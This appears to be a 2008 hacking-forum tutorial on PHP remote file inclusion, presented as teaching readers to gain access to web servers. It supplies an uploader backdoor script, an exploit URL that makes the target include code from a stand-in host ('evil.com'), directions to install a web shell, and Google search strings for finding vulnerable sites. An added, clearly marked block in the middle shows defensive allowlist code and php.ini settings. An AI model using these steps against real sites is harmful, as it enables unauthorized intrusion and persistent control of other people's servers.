Wednesday, August 20, 2008

Include Exploits





Website security: an old but very effective technique for gaining access to a web server

In this article I will teach you the basics of Include Exploits. Understanding PHP will help, although not much.

When a site uses one page to call all the others around a basic template, it can become subject to exploitation under certain circumstances.

e.g. http://www.abc.com/index.php?page=news

To test whether it's vulnerable, try changing the page value to abc or any other arbitrary value:

e.g. http://www.abc.com/index.php?page=abc

If it's vulnerable, you should get an error like this:

Warning: main(abc.php): failed to open stream: No such file or directory in /home/dir/public_html/index.php on line 01

Ok, now we are in business. We now know that the script takes $_GET['page'] and adds .php, then includes it.

e.g.
$page = $_GET ['page'] . ".php";
include ($page);
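
The defensive counterpart to the snippet above, as an added example that is not part of the original article: the request parameter only selects a key in a fixed allowlist and never becomes part of the path passed to include. The page names and the pages/ directory are assumptions made for illustration.

```php
<?php
// Added example (not from the original article): allowlist-based page routing.
// Page names and the pages/ directory are hypothetical.

// Vulnerable form shown in the article, kept here for comparison:
//   $page = $_GET['page'] . ".php";
//   include($page);

// Fixed map from public page names to files the application ships.
const PAGES = [
    'news'      => 'news.php',
    'downloads' => 'downloads.php',
    'contact'   => 'contact.php',
];

/**
 * Resolve a request parameter to an includable file, or null if not allowed.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Reject arrays (?page[]=x) and anything that is not an exact allowlist key.
    // URLs and ../ sequences fail here because they are not keys in PAGES.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    // The path is built only from constants; user input merely picks the key.
    $root = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // Defence in depth: the file must exist and resolve inside $baseDir.
    if ($root === false || $path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

$target = resolve_page($_GET['page'] ?? 'news', __DIR__ . '/pages');
if ($target === null) {
    // Generic 404 instead of an include warning, so no server path is disclosed.
    http_response_code(404);
    exit('Page not found');
}
include $target;
```

In php.ini, allow_url_include = Off (the default since PHP 5.2) stops include from fetching URLs at all, and display_errors = Off keeps warnings like the one quoted above out of responses.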

So, what we need now is an uploader to allow us to upload files onto their server. Here's some dazzling code written by cheesy himself:

<?php

if ( $userfile )
{
@$res=copy($userfile,"$userfile_name");
if ( !$res ){
print "Upload failed! \n";
}else{
print "Upload of $userfile_name successful \n";
}
}
?>

<FORM method=POST ENCTYPE="multipart/form-data">
File to Upload
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="5000000">
<INPUT NAME="userfile" TYPE="file" size=35>
<INPUT TYPE="submit">
</FORM>
</HTML>

So, we need to host this code on a server that doesn't support PHP, or just edit your htaccess so your server treats it as HTML or whatever. A good, simple free host that doesn't support PHP and is quick, easy and anonymous is cjb.net

So to exploit the page, simply add your URL for the uploader script:

e.g. http://www.abc.com/index.php?page=http://evil.com/uploader

Remember, if the site adds .php to the page variable, be sure to leave it off. Then the uploader pops up and you can install webadmin or a web-based shell.

To find vulnerable sites, we can use our best friend, Google. Good searches include:

inurl:"index.php?page=downloads"
inurl:"index.php?page=news.php"

Be imaginative :)

Thanks for reading, and I hope you've learnt something new.

Will.


© HellBound Hackers 2007- 2008. Since 3rd December 2004.